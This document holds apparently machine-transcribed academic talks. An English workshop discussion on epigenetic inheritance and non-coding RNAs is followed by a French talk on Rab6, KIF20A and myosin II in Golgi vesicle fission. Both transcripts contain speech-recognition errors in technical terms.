It keeps chemical signature, not behavior. Well, we'll see that it cannot keep this chemical signature, at least not at the epigenomic level. Because if we move directly to the next slide, actually, the epigenetic marks are erased during development. They are erased, almost completely erased. So you can always say that maybe the almost is the fact that it cannot be really. So this is the. It was a chemistry in the blood of a mother. They erased here. But then beyond development, this chemistry of the mother. Yeah. That's why it's developed. That is OK for the. But that is OK for the first generation. No, no, but I see what Michel is saying. This is OK for the first generation, but it's not OK for the second or sometimes the third generation. OK, so at a very important stage. So here are, for example, the methylation marks. So you had the DNA from the mother and from the father. So it's methylated here. And then at a very important stage, which is actually the stage where the embryo appears and the appearance of the embryo in extend cells, then almost everything is erased. So the epigenetic marks are lost. And then they reappear and you have differentiation of the cells. So how could the marks be transmitted if they are erased during the development? This is a completely unsolved issue at this point. But you can ask the question, are the epigenetic marks the only players? Or are there other players involved? At the genomic level, of course. And good candidates are non-coding RNAs. Non-coding RNAs are transcribed from the non-coding genome. So it means that they don't have any open reading frame to make proteins. Previously, the non-coding genome was called JANG DNA because it was thought that it is absolutely useless. Now it's rather called the dark genome. Why? In fact, the complexity of organisms is not correlated with the gene numbers. So if we take, for example, C elegans, which has 90, not far from 20,000 genes, it's a little worm, which has very little complexity. Very little complexity. It's a very small animal as well. And if compared that to human, human is thought to have about 24,000 genes. So you have very little differences in the number of genes. So the complexity of an organism is not linked to the number of genes. However, it is inversely correlated with the percentage of coding sequences. The less coding sequences you have, the more complex the organism is. And in fact, in human, it's 97% of the genome, which is non-coding. All the protein ohm that you heard about this morning represents only 3% of the genome. The rest is non-coding. So if you take, for example, this could be a human chromosome. Well, the coding part is here in red. And all the rest is non-coding. So for long, this non-coding genome has been of no interest at all. Again, it was called the GEN, the GEN DNA. And then the discovery of small, non-coding RNAs triggered the interest for the non-coding genome. So the non-coding RNAs are the microRNAs that I'm sure you heard about many times. So they are, they've been discovered in C. elegans. And they are very small RNA sequences, which bind to the messenger RNA and prevents the synthesis of protein, the translation of the messenger RNA. But small, non-coding RNAs represent a very small part of the non-coding genome. They are very short, and there are a few thousand of them, so they don't represent a whole thing. Now we know that actually almost all the genome, it's even more than 70% of the genome, is transcribed. We know that thanks to these new sequencing technologies, which allow to see molecules which are very little represented in a population. Because what we do in these technologies is that we sequence one molecule, the molecules one by one. So if we do enough molecules, if you have a molecule which is very little represented, you can see it. And because of course the transcription of the whole genome does not give rise to very frequent RNAs, it's been totally ignored up to now. But now we know that almost all the genome is transcribed, and it's mostly transcribed in long, non-coding RNAs. And we actually know that long, non-coding RNAs are able to modify the epigenome. It's been known for very long that there is a non-coding RNA, which is called XIST, which covers one of the X chromosomes in somatic cells of mammalian females, resulting in the epigenetic silencing of the anti-chromosome. You know that you have to have gene dosage on the X chromosome so that male and female have the same level of expression of the genes which are in the X chromosome. So in nature, there are different ways to achieve that. And in mammalian cells, one of the X chromosomes is inactivated. And it's inactivated thanks to this long, non-coding RNA, although the precise mechanism is not known. Do you know that is it known with every single one of those six bits of RNA are actually functional? No, of course not. Not yet. How will you determine that? Well, it's really starting now. It's been started for, I would say, five years now. What you do is, as usual, to analyze the function, you kill the molecule. No, but you have 70% of the genome is. It's even more than that. Well, you just said it's 70%, right? Yeah. So how are you going to walk through 70% of the genome and eliminate every single one? That's insane. Well, you will have to do that. Because there is no way that you can do a cell with only the 3% of DNA. So how would you test that? What people are doing right now is that they are looking at specific long, non-coding RNAs, which are differentially expressed in this or that situation in healthy cells versus whatever disease, or cancer, or whatever. And then they look into these differentially expressed. I think it's a little bit like what was done with the genes at the beginning. At the beginning, people looked at one gene, which is differently, blah, blah. And we didn't have the whole genome sequence, and blah, blah. Now, if the question is, did someone imagine a way to prove that this? I mean, there are many different sequences there. How would you imagine the index of time? Yeah. So the question is, did someone imagine how to prove that the 70% are functional? I don't think anyone did at this point. Come on. We know that most of it is not functional, because most of it is not under constraint. Well, that's not right. I think that's not the right answer. And I have a slide at the end, too. What do you prefer, too? Yeah, yeah, yeah, sure, sure, sure. No, no, no, no, no. No, no, we can have discussion. I don't think it's the right answer, because if you take only the constraint, the evolution constraint, then you will say that only the coding part is. And then you will conclude that there is absolutely or almost no difference between a mouse and a human, because it's 99.9% the same genes. So you have to admit that a zone without constraint plays a role in this. It's not, in fact, being different with a mouse and a human. Biologically, I think, negligible. In a reasonable, unprovaled respect with Serbia, I think objectively, why is there a big difference between mouse and human? The difference is not big, maybe, but it's the most important. We do not have whiskers. No, no, but I have the feeling it's a little bit more than that. Actually, Misha, you know that mouse is not a good model. For most of the diseases, because the mouse does not behave like the human. It's not more complex, but it's different. So to say, well, at least you need to have a measure. What do you mean? At least what you mean? Yeah. But you have this measure. The only point that can be said is that a mouse is different from a human. But if you take the genes, the enzymes and all that, they are very, very alike. The word you say, it's not different. The question is what you emphasize. It's appearance is different. It's not only the appearance. Even biologically, the mouse is different. For example, the lifespan, a mouse lives two years. There's an number of parameters. If you look at the parameters, there are 1,000 parameters in different channels. For example, one parameter the size. Come on. It's not big, big, big. You're being small. Yes. Another parameter is the thinking that the mouse doesn't have at this point. Or maybe yes. But not the same type of thinking. Not the same type of thinking. We tend to overemphasize humanity. Our perspective is just on the view. That's my point. What you're saying is that we are animals. And I think that's absolutely correct. But then there are many differences. And it's not only the mouse and the human. It's also, again, the C. elegans' worm. It's completely different. I mean, there are many, many genes which are in common. Actually, the coding sequence of genes, of the mouse and human, are almost identical. That's actually a good point because what is very diverse is the non-coding region. Exactly. It's my slide, actually. It's my last slide. Let's move to the last slide. The one that could determine, theoretically, what is a mouse? Exactly. That's my last slide. Maybe we can skip the last slide. OK, so what we can think is that maybe a non-coding RNA is to keep the memory. They might be in the cytoplasm of the maternal DNA, or they might be associated with the sperm DNA, whatever. But they can keep maybe the memory of these epigenetic marks. And then we come to the last slide. So there are all the open questions. So non-coding RNAs represent 97% of the genome. They are thus a huge molecular reason where to explain yet unexplained functions. And there are many of the functions which are not explained by genes, simply by genes. Also, and that's exactly the point of the discussion, in contrast to protein coding genes, which may be very similar between the different species. Non-coding RNAs are highly variable. They are not submitted to constraints from one species to the other and from one individual to the other, within the same species. That they have the potential to play an essential role in the differences between species and in the difference between individuals within a species. Yes? I just want to talk to your point about the coding regions being the same. That's like saying that in the human, the eye cells are really different from the cells on your hands, right? Like a difference between a mouse and a human. It has nothing to do with the different coding regions. It has to do with the way how the coding regions are regulated, right? Yeah, yeah, but in total, I mean, yeah, this difference within an organism. But in total, if you take the, it's like, I would say, the, whatever. In total, if you take the human and the mouse, they are, and the genome in total, they are not identical, but very similar. Yeah, but it's not about the actual sequence. It's about what is being regulated. What is being transcribed when? Yeah. The timing of the expression might be different. But actually, the non-coding region can regulate the expression of the coding region. Of course. So because the non-coding region is different, it could determine the difference in the expression. Of course. But my feeling, that's only a feeling, of course, is that the non-coding region doesn't do only, I mean, right now, we see it through the eyes of the genetics and the coding sequences. Everything, the game comes back to the coding sequences, OK? Everything is due to gene and protein. I don't think this is the case. And I have the feeling that the non-coding RNAs, they play a role in the, for example, in the brain functioning. So you started with the difference between different cells in the same organism, with brain and whatever other cells got. And about that, we already asked biologists to record development. And we have the answers already in the genome, because we have the description factors and then hence source. And we have, I'm not saying at all, but we are beginning to, yes, I just wanted to make a point. So we are beginning to understand it without looking at the non-coding. We know, at least one example, exists, that it is functioning. So there will be more. Although we don't know how it works, but we don't. We don't. No, but I mean, at least we know what it does. We are throwing it at 97% of the genome to ask biologists to figure out how we're going to figure out what it does. But the question is a good question, of course. Now, if we think, I don't think that the whole development is due to the genes. And if you take the example of the microRNAs, they were absolutely unknown. And so we didn't even think that this thing were working. So I wouldn't be this. So one point that we cannot, it is not completely true that they are not under constraints, because in different species, they keep the same position in some chromosomes and seems to be related to these chromatin organization maps that are. The sequence is under less constraints. And there are differences in the non-coding genomes. They are parts which are more common or more conserved and parts which are less. There are some, as if their chromosomal organization seem to be conserved across species. And there may be some functions at least for part of them to this chromatin. Yeah. What you're saying, if I understand it properly, is that they can be common functions between species for the non-coding RNAs. And what I'm adding is that might also be species-specific functions or even individual-specific functions. All right. Yeah. Let's suppose that you make an official genome where you get rid of all the everything. And you only have to open the frames. Yeah. Where would that happen? I don't think any. But maybe we should do it. But I don't think that the cell would line. I don't think they would line. It's the kinetics. It's the kinetics. Chromachylamoform. Chromachylamoform. Chromosome. No, no, no, no. I didn't say that. I said that you get rid of this bit. So you make only one small chromosome? You make one small chromosome with a coding sequence? I think actually very, no, but the way it's organized is chromatin in a particular shape. You need this mechanically, yeah? No, no, no. So what I'm just saying is that you convert a human being into a yeast. And I don't mean trans-tune. But I'm not sure that human cell will live. I don't know. I wish I, we have to try. We have to try. We have to try. Because, because the rest, because the rest of the cell has been, no, because I think, I'm not saying that I'm right, okay? It's just what I think is that the rest of the cell has been designed, I'm not designed, but has evolved to work with a complex genome. And I'm not sure, yeah. I'm not sure that if you take, but it would be an interesting experiment to do. And actually, I have a kind of provocative question. You explain us about the genetic marks, which connected with like chromatin, blah, blah, blah. And now you say about non-covinarinase, and of course the third question, how you think, you suggest they interplay between them, how this non-covinarinase can be involved? Yeah, I didn't go into the details. Yeah, yeah. I didn't go into the details. But for example, the XIST. No, but the XIST RNA modifies, yeah. The XIST RNA modifies the epigenetic marks on the chromosome, on the X chromosome, which is inactivated, okay? And there are other examples of that. So the non-covinarinase, they had the capacity to modify the genetic epigenetic mark. But I don't think it's the only way they work, that's my point. Okay, let's go. No, Anik, you choose who you want. You did not speak of plumps. I think it has well been shown some couple of years ago already transmission up to 8 or 10 generations in Arabi. Arabidopsis. I'm not a plant specialist, I have to say. No, no, no. I'm not a plant specialist, I have to say. Yeah, no, no. What is Mr. Antelion? Epigenetic transmission, the Vincent Collore. Yeah, yeah. It made a big jump in the literature, but so I wanted to know what is, since this... But the problem is, well, the problem in plants, I don't know if there is this erasement of the, you know, epigenetic marks. I'm sorry, I'm not a plant specialist, I don't have the answer. I know in Madal it appears, it occurs, but... I don't know if I'm here. So, a few comments. So, first of all, in your experiment of getting rid of most of the genome and seeing what happens, that's been done in nature several times. So, for example, the puffer fish has a genome which is 100 times smaller than other fish and humans, and it's still a fish, okay? So this proves that most of the non-coning genome is not required to make a fish. For this fish. So why do we study all this? Well... Nobody... Please, please, if... No, no, if I may comment, make me comment. If the evolution constraint is so strong and we don't need this 97% of genome, why has it been kept during the evolution? This is population genetics, so genome size is not correlated to complexity in any way. Genome size is to do with the strength of natural selection, so species which have very small, effective population sizes have very big genomes, so plants. Humans have a very small, effective population size. We went through a botanical history. This is why our genome is full of rubbish, okay? This is very well understood. Bacteria, fungi have very effective, very large effect of population sizes, very strong natural selection. Every single base pair is under selection and has a... has a fitness cost when you do something. Actually, it is not absolutely correct because it comes back to plants. In plants it is well known, for example, if you cut half, at least half of non-coding genome of......arabidopsis, it's not coding part. Why is there arabidopsis? It creates a normal plan from this story. But this is only in plants and maybe only arabidopsis, but this is very interesting thing. But maybe it is somehow connected with the case that in animals we have much less plasticity than in plants. But it just made the opposite point. It just made the opposite point. It's a fish that is a natural experiment. I told you, you can film if you said it. I have, so you agree. I agree, I agree. Then I agree, yes. But I don't know about animals. He's telling you about animals. The same thing happens in animals. You have very different genome sizes for animals which are very similar to each other. So the genome size is not related to complexity. You don't need most of the data. But you say about comparison and I say about experiment. It is not the same. Because comparison still don't say the actual result. Okay, but they agree with each other. They agree with each other. Another thing is also this measuring which bits of the genome are important. So there's two ways we can do this. One is by conservation during evolution. And this estimates that roughly 8% of the human genome is under constrained. As in it has been under selection during primary evolution. And the other one now is because we have so many sequences of individual human genomes. We can measure the allele frequency, the frequency of the mutations at every base. So the human population is large enough such that every generation would be in saturation metagenesis for the human genome now. So somebody is born with a mutation everywhere that is compatible with life. And through sequencing millions of genomes now we know the frequency at which you get mutations in the population. But when you say sequencing the whole genome or only the... It's mostly the exomes that are becoming the whole genome. And as this gets bigger and bigger then we will be able to measure exactly how important every base of the human genome is. So this is the other way to answer your experiment. It's like we will have the numbers to do this to say this base is exactly this important for the fitness within... But again, this is not taking into account the individual differences. So maybe this base is very important in general. But this other base which is only present in two people is the one base which makes the difference between these two people. Excuse me, I don't understand where this 97% figure comes from then. I didn't do the experiment myself but it's the percentage of DNA which open reading frame of sufficient size to make a protein. Because what I heard is that like 8% has been shown that has some... Well, it depends on the species. So in human it's 3% but in other species it's more. No, but the 97% is definitely not all non-coding RNAs. This is your point. A lot of it is... A lot of what? It's non-transcribed at all, you mean? Yeah, well, of course. Well, at least there are parts of the genome that we can not even sequence properly. So of course we cannot know if they are transcribed or not. But they are going to come to 100% of course. Yes. So why are you also focused on the genome? There are many more molecules which are passed from one generation to the next. And I'm sure you've talked about germplasm and glycocontregated proteins and whatnot. I'm just curious to know. No, they might be part. But at some point you have to remodel the genome because if you take after the erasement of the marks, you can re-colore the marks. And you start with the stem cell, which is a blah, blah, blah. And so glycoconjugated, they can induce the modification, the epigenetic modification question. Yes, why not? But at this point it has not been proven that any sugar influences the genome. So, I mean, the stretch of the genome. Did anybody ever do an experiment by microinjection of long non-coding RNAs into a protein? Yes, that. Oh, in fertilization. And to show that they actually affect the... Not yet. So how do we know they are important? It's all correlation. It's an open question again. It's not a demonstrated fact. Why do they experiment? She wants us to do it. She's just suggesting an idea. She's just coming up with an idea. That's it. I totally agree that this is not proven. But there are many examples of RNAs, non-coding RNAs, which are modifying the genome. There exists one. And there is another one, which is very interesting, is the parametria. The parametria has two nuclei, micronuclei and a micronuclei. And the micronuclei has actually the whole genome and is very condensed. It's like the storage of the genome. And the other nuclei, nucleus, is very large. It has uncondensed DNA, and it's the part which is expressed. And during the division, the cell division, the micronuclei will give rise to a micro and a micronuclei. And the macronuclei, the sequences which are not expressed, are deleted. And this is directed by RNAs. So there are examples, many examples. But it's parametria. Sure. It's not a mammoth. No, sure, of course. But it is exactly in parametria that you have the heredity, non-DNAs. Oh, no, but... Thomas Sonebaum. That's exactly the history of life. No, no, but I'm not talking about the genetics of the animals. I'm talking about the molecular... I'm talking about the mechanism. About something which is different. Yes. Of course, but the molecular mechanism exists. That's what I'm saying, okay? In C-elegan, it was done in C-elegan. Yeah, of course. In C-elegan, also. Yeah, it was shown genetically. But in a way, microRNAs, not so well-teachable now as an example of non-coding, of this long non-coding RNAs, because they have their genes. They are transcribed as genes, but not protein genes. They are still not this junk of black... Yeah, but those are not protein genes either. No, they are not. They are not protein genes, but they are not on the other... They are transcribed. They are... There is a long association between long-coding RNA and disease. In disease. For example, in cancer. Yeah, yeah, absolutely. I believe in diabetes, maybe, as well. No, no, no. In cancer, very well. There are several long... There are those which are really looked at now. So, 50% are coding from this long non-coding. 50% can code for micro-portings. Right. Yes, that's right. But it has not been proven that these micro-proteins... Some of these micro-portings are very important. Yeah, yeah, yeah. I'm aware of that. They are very small polypeptides. Very small peptides, actually. Yeah. So, it's not proven that they have any function at this point. But it's... Yeah, they are part of this on coding. They have very small open reading plans. Do you synthesize? Many of them are not synthesized? No, they are synthesized and they have a function. Well, the function is not for sure. They are synthesized. Yeah, they are synthesized. Do you think they are only after a long, long, long time synthesized by being digested? Yeah, if they are very small, they can come from... From the point of extension to sideways. Yeah, but one reason also why they are studied is because in different tissues, long RNAs have the same expression pattern. So, if you take a liver or a neurons, you see the same long RNAs expressed in the same tissues. So, this is also one reason why they are... At some point, they try to understand what they do in the cell. Because there are kind of reproducible expression patterns for these long RNAs in osteoarthritis tissues. Well, but that's a correlation and also it can be because of the different types of transcription factors in the different tissues. Right, they said they seem to be under some regulations. Yes. Oh, yeah. Okay, so we can take one last question. Do we have one? Everybody is angry, I think. Everybody is angry.
|
In this workshop, I will review the molecular bases of Epigenetics, as well as some essential but yet unsolved questions, which will be a subject of further discussion. As a part of it, a new hypothesis of the role of small non-coding RNAs in epigenetics will be presented.
|
10.5446/50883 (DOI)
|
... Ok, merci. Donc je dois vous remercier pour parler de la GTP. C'est ce que tu as dit? Non. Non. Non. Non. Ok. Je vous remercie. Ok, merci. Je veux remercier Nava pour organiser cette meeting. C'est une grande opportunité pour interroger avec les mathématiques. Je dois dire que je suis en charge d'un programme de biais que la GATS a été institué en Paris. Le but de ce programme est de fosterer l'interaction entre biologiques, physiciens, mathématiques et chemistes. C'est une bonne opportunité pour un meeting comme ça. Comme Kati m'a dit, je vais parler de notre favorite rap GTP, rap 6. Tu as déjà parlé d'un compliment du Jean-Chi Chen et du Judith. Je vais vous présenter une fois de suite cette famille de protéines. Les protéines de rap GTP sont des races superfamilies. Comme tu le sais, ces protéines contiennent beaucoup de protéines. Vous avez les races, les RORAC, les CDC42, les SAR1 et les rapes. Toutes ces protéines, qui sont aussi appelées les GTPs, ont exactement la même structure. Ils ont un moléculaire de 20 à 25 et tout traite ce domaine conservé qui est interprété en GTP, les binding et les hydrolysis GTP. Les RAPGTP sont les plus grandes familles de cette famille de races superfamilies. Il y a d'ailleurs 70 membres qui ont été identifiés en humain. Nous ne savons pas la fonction exacte de la plupart. Nous savons que les GTPs sont la principale fonction de la famille. Il y a deux fonctions principales qui sont relativement à l'un de les fonctions. C'est de réguler le transport de la famille. Les RAPGTPs sont interprétés dans le binding de ce transport de la famille. Ils sont interprétés dans le mouvement du transport de la famille entre le macotubule et le cytoskeleton. C'est l'un des principaux effecteurs de la RAPGTP, un moteur moléculaire, un myosin ou un kinésine. Les RAPGTPs sont aussi interprétés dans le target de ces vesicles pour un membre accepteur. En particulier, ils recrutent un complexe de protein appelé le tazurine. Un autre point qui ne sera pas adressé à ce point est que en fait, il y a un cycle de RAPGTPs entre le cytoskeleton et le membre. Ce cycle est comparé à l'activation de la GTPGTP. Un autre rôle important de RAPGTPs est de former un domaine membre. Ces domaines sont utilisés dans les plateformes signales et probablement pour beaucoup d'autres fonctions de celles. Un exemple le meilleur est RAP5 GTPs, qui est installé en plus d'un an. RAP5 GTPs recrutent une série de proteins qui sont en train de former un domaine de RAP5 sur le membre de l'arrière. Ce sont les outlèques de ma discussion aujourd'hui. Si j'ai le temps, on parle des mécanismes qui ont été formés par le GTPGN membre. Il n'est pas encore publié que RAP6 est un régulateur général de post-GTPG. Si j'ai le temps, on a maintenant créé un modèle de maus pour étudier la fonction de RAP6 en espécifiquement la linéaire de la tâche. RAP6 est une de les 6 proteins de la GTPGN qui sont concernées par l'évolution, par les maman et l'homme. RAP6 est une de ces genes. Je ne fais pas le détails, mais il y a 4 formes de RAP6. Je vais parler d'un exemple d'un exemple unique entre les formes de RAP. Ces 2 formes sont générées par l'attentif de la même gene. Les 2 proteins sont très très clés. Nous ne savons pas exactement. Ils sont localisés dans le même compartiment. Ils sont probablement différents. RAP6, dans mon laboratoire, a été modifié par un modèle de fonction de RAP6. RAP6, à un état étudiant, est localisé dans le complexe de GOLG et est principalement au site de la GOLG et la TGN, la nette de GOLG. RAP6 a en fait regulé plusieurs états transports. L'un des états transports, je ne vais pas parler d'aujourd'hui, est le passeway qui connecte le système de mattaire, donc le sortage de la GOLG ou la récycle de la GOLG. Ce passeway est utilisé par un protein de genus, mais aussi par des toxines, comme la chigatoxine, pour interroger et intoxiquer le sang. L'autre fonction de RAP6, qui sera illustré en un moment, est de réguler les transports antérographe, donc les transports de la TGN, et le passeway de la GOLG. RAP6 est aussi interroger en rétro-graphe entre la GOLG et le passeway de la GOLG. La première partie de mon tour est de présenter le data sur les mécanismes qui déclencent la formation de la TGN. Nous avons publié plusieurs années auparavant que le système de mattaire est requérant pour cette formation. C'est une situation normale, donc c'est un contrôle de la cellule. Celle-ci a été faite en cellules et a été fabriquée en cellules de la TGN. C'est un set, donc c'est la GOLG, et c'est tous ces vesicles qui bougent, ou qui vont retourner vers la GOLG. C'est une situation normale. Si vous bloquez la TGN2, avec un limiter, ce que vous commencez à voir sont les tubes qui sont toujours connectés avec la GOLG membre. Ces tubes correspondent aux vesicles qui ne peuvent pas s'échanger du GOLG. Nous avons vu cela en Vittorre longtemps plus tard avec Patricia. Si vous vous mettez sur une membre des moteurs, vous avez besoin de la cotubule, si vous vous indiquez l'efficier, vous verrez la formation de ces membre. Nous avons essayé de comprendre plus en plus le travail de maigre. Ce que nous avons fait recently est de regarder attention à ce qui se passe à l'évolution de la GOLG. Donc, maintenant, c'est la zoom sur la GOLG complexe, c'est la RAP6 et la GOLG. Si vous regardez attention, c'est tous ces vesicles qui bougent vers la GOLG membre. En fait, si vous regardez attention, vous voyez que la majorité des vesicles sont toujours formés dans le même endroit dans la GOLG. C'est ce que nous avons dit au point de la formation vesicle dans la GOLG. C'est donc montré en plus en détail sur ce site, donc il est pris de la même caméra. Vous pouvez donc tracé ces vesicles et pour l'instant, si vous regardez ici, vous voyez que l'un des vesicles est bougé, puis l'autre est formé dans le même endroit. Et aussi, ce que vous pouvez montrer est que si vous si vous vous trouvez avec le bébé statin que nous bloquons dans l'activité 2, donc, comme je vous le montre, vous voyez ce tube est connecté à la GOLG membrane par le défectif fichier. Donc, en fait, ce processus est réversible, donc vous pouvez voir le bébé statin et puis le pass de secréterie commence à nouveau et puis vous commencez à faire, les tubes se dissapplirent et vous faites des vesicles encore. Et si vous regardez attention, vous pouvez voir que ces tubes de membrane sont aussi formés dans ce tube de membrane de GOLG. Ok, donc, la question était de comprendre comment ce tube de membrane de GOLG peut être formé. Et donc, nous espérons si il y a une connexion entre le bébé statin et la networks pour expliquer ce tube de membrane. Donc, comme je vous le dis, la question est très importante et je vous le dis, c'est un processus très important. Et donc, nous avons un processus très important et on a aussi dit que la re-6 intervient avec le kinésine. À la fois, nous appelons le kinésine 6. Donc, nous avons réadressé ce sujet recentement et regardons la localisation de KIF-20A sur GOLG. Et comme vous pouvez le voir, vous pouvez détecter un pool de KIF-20A qui est localisé avec un GOLG marker G130, G1406 qui est présent sur cet GOLG et en fait, il y a un individu spécifique de KIF-20A qui est appelé PAPRO-TRAIN. En fait, ce individu est mis en place par une petite compagnie pour développer l'anticancer, je veux dire, pour bloquer le mitociné dans la cellule de cancer. Donc, dans le sens de notre surprise, parce que à l'envers, nous pensions que ce kinésine était un kinésine qui mène ce vasicule, le vasicule, à l'alimentation du micro-tubule. Mais en fait, ce n'est pas le cas parce que quand vous inubilez l'activité ATP de kinésine avec cet inubile vous aussi voyez l'apparence de ces tubes membres qui sont décrivés après l'inhibition de la méisine 2 qui signifie que KIF-20A était aussi invoqué dans le processus officiel de cet vasicule. Et puis, ce que nous essayons de faire est de regarder la location de ces protéines. Donc, la méisine 2, la méisine 2, le KIF-20A et le KIF-20A. Donc, vous trouvez la cellule avec cet inhibite et puis vous regardez où les protéines sont localisées sur ces tubes membres et vous pouvez voir que à la base de ces tubes vous pouvez détecter le KIF-20A qui est un argument qui dit que peut-être les protéines 3 peuvent être invoquées dans cette machine officielle. Et en fait, donc, nous avons travaillé sur notre laboratoire et autres nous avons aussi montré que, en fait, ces protéines 3, nous savons que les WAP-6 interagent avec le KIF-20A, les WAP-6 interagent directement avec le KIF-20A. Donc, il y a une networks complète de interactions entre les protéines 3 et donc, pour aller plus donc, ce que nous pouvons montrer est qu'il y a un complexe entre les protéines 3 que vous pouvez vous pouvez immunoprecipiter les protéines 3. Et aussi, ce que nous pouvons montrer est que, en fait, pour avoir une interaction entre le KIF-20A et le Maze-2, vous avez besoin de WAP-6. Donc, ceci est montré juste dans cette planète, donc, c'est un expériment classique. Donc, c'est un traitement qui explique le KIF-20A donc, vous faites un IP donc, vous pouvez voir que vous avez immunoprecipité avec le KIF-20A GFP ou AndoGNUS. Maintenant, si vous remouvez WAP-6 par SONA, vous voyez que vous ne pouvez pas immunoprecipiter les protéines 2 anymore. Ce qui veut dire que WAP-6 vous avez besoin de WAP-6 pour la interaction entre les 2 les 2 protéines. Ce que nous pouvons montrer aussi c'est que le KIF-20A est en fait requiert pour le recrutement du Maze-2 sur le GOLGIEM membrane donc, ceci est montré dans cet expériment, donc, c'est la situation de contrôle. Donc, vous quantifiez le signal du Maze-2 que vous pouvez voir au GOLGIEM membrane. Si vous remouvez le Maze-2 par SONA, si vous remouvez le Maze-6 A et vous apprêtez aussi vous recruez le Maze-2 par le GOLGIEM qui signifie que le Maze-2 est en train de recruter le Maze-2 par le GOLGIEM. Mais si vous recruez le KIF-20A vous recruez aussi le nombre de Maze-2 par le GOLGIEM. Ok, donc, pour mieux comprendre ce qui s'est passé donc, nous avons entre le sel avec le nocturne et puis, nous avons fait un expériment qui s'appelle la grossesse du micro-tubule. Donc, comme vous le savez, le GOLGIEM est capable de nucléer les micro-tubules et ces micro-tubules sont en fait utilisées pour le traficage post-GOLGIEM de la GOLGIEM. Donc, si vous faites ça, vous pouvez aussi montrer que vous recruez le sel avec le nocturne et puis, vous recruez le nocturne et puis vous pouvez voir que le KIF-20A peut collocer sur ce micro-tubule de la GOLGIEM. Et le dernier expériment que je veux vous montrer avant le modèle est le frappe expériment. Donc, en fait, ce que nous avons fait est de frapper ce qu'est le RAP6 donc, vous frappez le GOLGIEM et puis vous regardez le signal RAP6 et vous regardez le récourissement de la grossesse. Et puis, vous comparez ce que c'est, donc vous mesurez en fait la diffusion de la RAP6 dans le plan de le plasma membrane. Donc, si vous utilisez le KIF-20A inhibitor vous voyez que vous recruez une demi-heure de récourissement qui signifie que, en fait, la diffusion est plus vite quand vous inhibite le KIF-20A. Donc, je vous montre le modèle oui, donc aussi je veux comprendre que nous mesurez la relative affinité entre les trois protéines. Donc, je vous montre le modèle. Donc, ce que nous pensons est que le GOLGIEM est un foren, un TGN membrane. Donc, je pense que le premier événement donc, RAP6 est diffusé sur le plan de la GOLGIEM de la membrane. Et puis, RAP6 probablement recrue le premier KIF-20A et puis la MISIN2 et puis, ça fait un complexe entre les trois les trois protéines. Et puis, le modèle visuel de GOLGIEM et ce modèle visuel s'étendu par le micro-tubule. Et puis, le netto actin est utilisé par le visuel de la GOLGIEM. Donc, c'est un exemple d'une très rare exemple d'une connexion entre GOLGIEM actin et micro-tubule pour former un visuel de la GOLGIEM. Ok, donc, la deuxième partie de la GOLGIEM. C'est le premier slide, juste un second, parce que vous pouvez le faire plus tard. Ah, pardon. 1, 2, 3, 4, 5 signifie le numéro. Mais ils vont, comme dans le cercle? Non, non, non, non. C'est un modèle. Donc, on met le numéro pour dire, ok, alors, vous avez le premier RAP6 et le premier RAP6 recrute le 2e, recrute le 2e, et puis ce mec. Ah, c'est ma maitre. 4 et 5, vous avez ce... Donc, pour le système, c'est plus, je veux dire, et puis, le visuel formule, et puis le visuel est cut et puis, il se démarre de la gorge. Donc, ce n'est pas comme, ça peut être de n'importe quel endroit, parce qu'il peut aller 1, 2, 3, 4 et puis 5. Oui, oui, donc peut-être le modèle peut être un peu plus, non. Non, non, non, non. Je vois ce que vous voulez. Donc, c'est un autre spot, si vous voulez, ici, et puis, non, je veux dire, c'est un autre spot. C'est juste l'horreur des événements. Non, non, non, ce n'est pas passionnant. Je veux dire, probablement les événements ont été placés en même endroit, très près aussi, mais... Une question très bonne. Vous pensez qu'il y a un involvement du cycle GTP qui régulate vraiment le modèle RAP6 dans le modèle? Oui, je pense que c'est probablement un cycle. RAP6, nous ne savons pas exactement le gaffe et le cap. Donc, c'est difficile. Donc, si vous êtes dans le modèle RAP6, ce n'est pas comme... Ce n'est pas comme une distribution spéciale, parce que, de toute façon, ce n'est pas spécial, comme Thomas a dit, c'est l'horreur des événements. Excuse-moi. Je m'ai perdu ce que le Myosin 2 fait ici. Qu'est-ce que le Myosin 2 fait ici? Je n'ai pas compris. Donc, ce que nous pensons, le Myosin 2, si vous êtes un peu le Myosin 2, vous ne pouvez pas évoluer ce physique. Nous pensons que le Myosin 2 s'involue en évoluant. Vous savez comment? Vous pouvez l'aider? Non. Nous... Il y a plusieurs hypothèses. Nous essayons avec Patricia, de reconstituer ces hétérones en vitro, en géant. Il y a plusieurs possibilités. Et aussi, nous ne savons pas exactement l'organisation actuelle de la géant. Nous savons que c'est actuel. Mais, comment est-ce organisé, si c'est un hétérone actuel ou actuel philemant? Je pense que ce n'est pas... ce n'est pas... ce n'est pas... Une possibilité, peut-être que Patricia peut expliquer mieux que moi, peut-être que vous avez le Myosin 2 et vous avez cette contraction. Et vous avez des études qui ont montré que cette contraction de Myosin 2 peut induire la séparation face de l'hétérone. Et cette séparation face pourrait être directement évoluée dans l'affichage. Mais, je veux dire, il ne nous sait pas. Vous savez, est-ce que l'actuel est évolué? Est-ce que vous avez des évoluées, des moules, des protéines? Oui, nous savons que c'est après-midi dans le Golgi, tous les actes nucléaires sont présents dans le Golgi. Vous avez vu le CDC 42, non? Et aussi, le CDC 42 est aussi évolué dans ce sens. Est-ce que vous avez l'air un peu plus fort? C'est une bonne question. Je pense que nous avons fait des dégâts avec un app. 2.3 et il semble que ce app. 2.3 pourrait être présenté dans le HotSport, mais ce n'est pas... Ok. Ok, la deuxième partie de mon tour qui n'est pas publiée est un certain évident que nous avons à dire que le Trapsis pourrait être un régulier général pour le trafic post-Golgi. Donc, pour cela, nous utilisons un assais, ce qui s'appelle Roche Assais, qui a été développé par le groupe de Frank Perez à l'Institut Curie, le département de celles biologiques. Donc, c'est un assais qui est basé sur le système de strata-vidin. Donc, dans le brief, vous faites un oeuf dans l'EA, et puis vous étagez le cargou avec le protein de strata-vidin. Donc, dans les conditions normales, cela fera la rétention de ce cargou, le cargou secret dans l'EA. Vous avez juste ajouté la bietin, le vitamines, dans le milieu. Et puis, cette association entre le cargou et le oeuf est réellue, et le secret est en train de travailler. Je vous montre. Vous pouvez le faire avec une grande variété de protein. Nous parlerons aujourd'hui de 3 protéines, 3 cargou, que nous suivons. Un est un protein de GPI, un autre est un protein de transombre, TNF-alpha. Et le dernier est un cargou soluble, collage N10 que nous avons hésitôt depuis Alberto's talk. Ok, donc, juste pour illustrer le système de strata-vidin. Donc, c'est un CD59. Donc, c'est le début de l'expérience. Donc, c'est un CD59 présent dans le particule de l'endoplasme. Donc, vous vous ajoutez la bietin au milieu. Et vous pouvez 